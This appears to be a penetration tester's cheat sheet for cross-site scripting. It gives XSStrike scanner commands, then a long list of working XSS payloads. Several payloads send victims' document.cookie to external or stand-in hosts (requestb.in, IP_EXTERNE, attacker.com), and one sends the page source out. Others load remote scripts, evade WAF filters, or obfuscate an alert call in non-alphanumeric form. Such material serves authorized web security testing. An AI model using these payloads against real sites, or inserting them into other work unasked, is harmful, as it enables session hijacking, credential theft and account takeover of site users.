xss
Cross Site Scripting detection suite equipped with parsers.
XSStrike analyzes the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine.
Documentation
Usage Commands
Classical GET:
python xsstrike.py -u "http://example.com/search.php?q=query"
POST:
python xsstrike.py -u "http://example.com/search.php" --data "q=query"
Path payloads:
python xsstrike.py -u "http://example.com/search/form/query" --path
Crawl and test:
python xsstrike.py -u "http://example.com/page.php" --crawl
Load payloads from file and test them:
python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt
Find hidden parameters:
python xsstrike.py -u "http://example.com/page.php" --params
method uniq
https://github.com/yavolo/eventlistener-xss-recon
Method 1: Unique
Method 2: CleanP and InjectP
Method 4
Tips
If XSS is not executed through the UI, you can try to insert it through the API
It can then fire on the UI. Many filters are not present like this
Payloads
# Document.location
<script>document.location('http://IP_EXTERNE/'+document.cookie)</script>
<script>document.location.href = 'http://requestb.in/XXXXXX?cookies =' + document.cookie;</script>
# Window
<script>window.open("http://monserveur/Cookie="+document.cookie)</script>
<script>window.location='http://monsite.free.fr/script.php?cookies='+(document.cookie);</script>
# Document.write
<script>document.write('<img src="https://requestb.in/xxxxx?cookie="+document.cookie>admin</img>');</script>
admin"></i>)</span><script>document.write("<img src=http://requestb.in/XXXXX?cookie=".concat(encodeURI(document.cookie)).concat("/>"))</script><i>
<script>var xhr = new XMLHttpRequest();xhr.open('POST', 'http://requestb.in/w0sw22w0', true);xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xhr.send(document.cookie);</script>
# alert(1) in JS
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
injecting inside of input tags
<input/onfocus=alert(0) autofocus>
<input/onfocus=alert`0` autofocus>
<input/onfocus=prompt`0` autofocus>
1'"><input/onfocus={alert`1`} autofocus>
# WAF Bypass
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<svg/onload=(((confirm(1))))>
confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)
# No HTML events
<script>alert(1)//
<script>alert(1)<!--
<script>alert(1)%0A-->
<script src=data:,alert(1)>
<script src=//HOST/FILE>
<script src=https:DOMAIN/FILE>
<svg><script xlink:href=//HOST/FILE>
<svg><script xlink:href=https:DOMAIN/FILE>
<svg><script xlink:href=data:,alert(1)>
<svg/onload=(confirm(1))>
<svg/onload=confirm(1)>
# Stealing the source code without triggering browser restrictions
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">
# Non alphanumeric alert() payload
Ð=[],Ř=+!+Ð,ˍ=Ř+Ř+Ř,Š=!!Ð+Ð,Ť=!Ð+Ð,Ǎ=(!Ð+{})[Ř+[+Ð]],Č=(Ð+{})[Ř],Ȟ=Š[Ř],Ě=Š[+Ð],_=Ť[ˍ]+Č+Ȟ+Ě,ǰ=Ð[_]+Ð,š=Ð[Ð]+Ð,Ð[_][Ǎ+Č+(š)[Ř]+Ť[ˍ]+Ě+Ȟ+(š)[+Ð]+Ǎ+Ě+Č+Ȟ](Ť[Ř]+Ť[Ř+Ř]+Š[ˍ]+Ȟ+Ě+ǰ[Ř+[ˍ]]+ǰ[Ř+[ˍ+Ř]])()
Last updated